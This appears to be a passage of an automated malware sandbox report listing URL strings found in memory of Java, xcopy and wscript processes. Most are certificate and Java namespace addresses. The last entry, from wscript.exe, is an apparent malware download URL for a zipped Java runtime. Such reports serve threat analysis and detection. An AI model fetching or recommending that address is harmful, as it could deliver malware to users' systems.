Source: javaw.exe, 00000006.00000002.2846518429.000000000A5B2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A5E2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.00000000048DE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009B55000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.000000000492B000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009BB6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009BEA000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1714657743.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1709635619.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1712140938.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1732774705.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733577711.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1708776486.000000000348E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1744124031.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1742568613.000000000348F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: javaw.exe, 00000006.00000002.2846518429.000000000A5E2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009C08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
Source: javaw.exe, 00000006.00000002.2846518429.000000000A578000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A5B2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.00000000048DE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009B55000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.000000000492B000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009BB6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009B79000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1714657743.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1709635619.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1712140938.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1732774705.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733577711.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1708776486.000000000348E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1744124031.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1742568613.000000000348F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: xcopy.exe, 00000015.00000003.1714657743.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1709635619.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1712140938.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1732774705.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733577711.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1708776486.000000000348E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1744124031.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1742568613.000000000348F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: javaw.exe, 00000006.00000002.2846518429.000000000A5E2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009C08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl
Source: javaw.exe, 00000006.00000002.2846518429.000000000A5B2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A5E2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.00000000048DE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009B55000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.000000000492B000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009BB6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009BEA000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1714657743.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1709635619.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1712140938.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1732774705.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733577711.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1708776486.000000000348E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1744124031.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1742568613.000000000348F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: javaw.exe, 00000006.00000002.2846518429.000000000A5E2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009C08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: xcopy.exe, 00000015.00000003.1742568613.000000000348F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: xcopy.exe, 00000015.00000003.1714657743.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1709635619.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1712140938.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1732774705.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733577711.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1708776486.000000000348E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1744124031.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1742568613.000000000348F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: java.exe, 00000002.00000002.1637605836.000000000960A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A5B2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009BB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731447511.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2847662929.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009D06000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009D48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/dtd/properties.dtd
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/dtd/properties.dtdC
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/dom/properties/
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/dom/properties/(
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-check
Source: java.exe, 00000007.00000002.2847662929.000000001516B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731688566.0000000015164000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731447511.0000000015142000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-checkrce
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/k
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731447511.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2847662929.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage4
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731447511.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2847662929.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSource
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSource3
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/schema/features/
Source: java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/c
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd/No
Source: java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-state
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/report-cdata-event
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731447511.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2847662929.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processingK
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/3
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/8
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731447511.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2847662929.000000001518C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD;
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731447511.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2847662929.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchema
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchemaD
Source: xcopy.exe, 00000015.00000003.1765528442.000000000348E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature
Source: javaw.exe, 00000006.00000003.1724377544.0000000015BC0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1726139044.0000000015BD8000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A703000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2850756456.0000000015BBF000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009D4A000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2847662929.00000000151CB000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731368562.00000000151CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://null.oracle.com/
Source: javaw.exe, 00000006.00000002.2846518429.000000000A5E2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009C08000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com
Source: xcopy.exe, 00000015.00000003.1714657743.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1709635619.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1712140938.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1732774705.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733577711.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1708776486.000000000348E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1744124031.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1742568613.000000000348F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: javaw.exe, 00000006.00000002.2846518429.000000000A5B2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A5E2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.00000000048DE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009B55000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.000000000492B000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009BB6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009BEA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009C08000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1714657743.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1709635619.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1712140938.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1732774705.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733577711.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1708776486.000000000348E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1744124031.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1742568613.000000000348F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: javaw.exe, 00000006.00000002.2846518429.000000000A578000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A5B2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A5E2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.00000000048DE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009B55000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.000000000492B000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009BB6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009B79000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009C08000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1714657743.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1709635619.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1712140938.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1732774705.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733577711.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1708776486.000000000348E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1744124031.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1742568613.000000000348F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: javaw.exe, 00000006.00000002.2846518429.000000000A5B2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A5E2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.00000000048DE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009B55000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.000000000492B000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009BB6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009BEA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009C08000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1714657743.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1709635619.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1712140938.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1732774705.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733577711.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1708776486.000000000348E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1744124031.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1742568613.000000000348F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: wscript.exe, 00000005.00000003.1676050715.000000000724E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1675412730.00000000070EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1644340585.0000000005DB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1663209732.000000000724C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1672647608.00000000064A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1667606909.0000000002C62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.1682669440.0000000002B73000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1669088910.0000000005DBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1672816885.0000000006C13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wshsoft.company/jv/jrex.zip
